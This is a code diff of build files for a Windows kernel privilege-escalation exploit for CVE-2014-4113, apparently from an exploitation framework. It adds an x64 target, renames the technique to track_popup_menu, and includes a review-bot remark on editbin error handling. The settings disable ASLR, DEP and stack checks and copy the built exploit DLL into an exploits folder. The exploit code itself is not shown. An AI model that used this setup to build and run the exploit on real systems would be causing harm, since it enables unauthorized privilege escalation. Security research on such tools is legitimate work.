<TargetMachine>MachineX86</TargetMachine>
<Profile>false</Profile>
<ModuleDefinitionFile>
</ModuleDefinitionFile>
<AdditionalOptions>/ignore:4070</AdditionalOptions>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "..\..\..\..\..\data\exploits\CVE-2014-4113\" GOTO COPY
mkdir "..\..\..\..\..\data\exploits\CVE-2014-4113\"
:COPY
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2014-4113\"</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<CompileAs>CompileAsC</CompileAs>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<CompileAs>Default</CompileAs>
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE_2014_4113_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>false</FunctionLevelLinking>
<PrecompiledHeader>
</PrecompiledHeader>
<AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
<ObjectFileName>$(OutDir)\</ObjectFileName>
<ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<BufferSecurityCheck>false</BufferSecurityCheck>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
</ClCompile>
<Link>
<AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<IgnoreAllDefaultLibraries>false</IgnoreAllDefaultLibraries>
<IgnoreSpecificDefaultLibraries>%(IgnoreSpecificDefaultLibraries)</IgnoreSpecificDefaultLibraries>
<DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
<GenerateDebugInformation>false</GenerateDebugInformation>
<OptimizeReferences>true</OptimizeReferences>
<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile>
<GenerateMapFile>true</GenerateMapFile>
<MapFileName>$(OutDir)\cve-2014-4113.map</MapFileName>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>
</OptimizeReferences>
<EnableCOMDATFolding>
</EnableCOMDATFolding>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention>
</DataExecutionPrevention>
<ImportLibrary>$(OutDir)\cve-2014-4113.lib</ImportLibrary>
<Profile>false</Profile>
<ModuleDefinitionFile>
</ModuleDefinitionFile>
<AdditionalOptions>/ignore:4070</AdditionalOptions>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.01 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "..\..\..\..\..\data\exploits\CVE-2014-4113\" GOTO COPY
mkdir "..\..\..\..\..\data\exploits\CVE-2014-4113\"
:COPY
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2014-4113\"</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="cve-2014-4113.c" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>
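Review bot: In the Release post-build commands the exit status of `editbin.exe` is never tested and its output is redirected to `NUL`, so as far as the command text shows the `copy /y` step still runs when the header-stamping step failed. Adding `IF ERRORLEVEL 1 EXIT /B 1` directly after the editbin line would stop the build instead of copying an unstamped binary. The Win32 command stamps `/SUBSYSTEM:WINDOWS,4.0` while the x64 one stamps `5.01`. Old and new lines are interleaved in this rendering, so it is worth confirming that the difference is intentional on the new side.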


@ -4,14 +4,15 @@
<SolutionPath>.\cve-2014-4113.sln</SolutionPath>
</PropertyGroup>
<Target Name="all" DependsOnTargets="x86" />
<Target Name="all" DependsOnTargets="x86;x64" />
<Target Name="x86">
<Message Text="Building CVE-2014-4113 win32k_null_page x86 Release version" />
<Message Text="Building CVE-2014-4113 track_popup_menu x86 Release version" />
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
</Target>
<Target Name="x64">
<Message Text="CVE-2014-4113 is not supported in x64" />
<Message Text="Building CVE-2014-4113 track_popup_menu x64 Release version" />
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=x64" Targets="Clean;Rebuild"/>
</Target>
</Project>


@ -48,7 +48,7 @@ IF "%ERRORLEVEL%"=="0" (
)
IF "%ERRORLEVEL%"=="0" (
ECHO "Building CVE-2014-4113 (win32k_null_page)"
ECHO "Building CVE-2014-4113 (track_popup_menu)"
PUSHD CVE-2014-4113
msbuild.exe make.msbuild /target:%PLAT%
POPD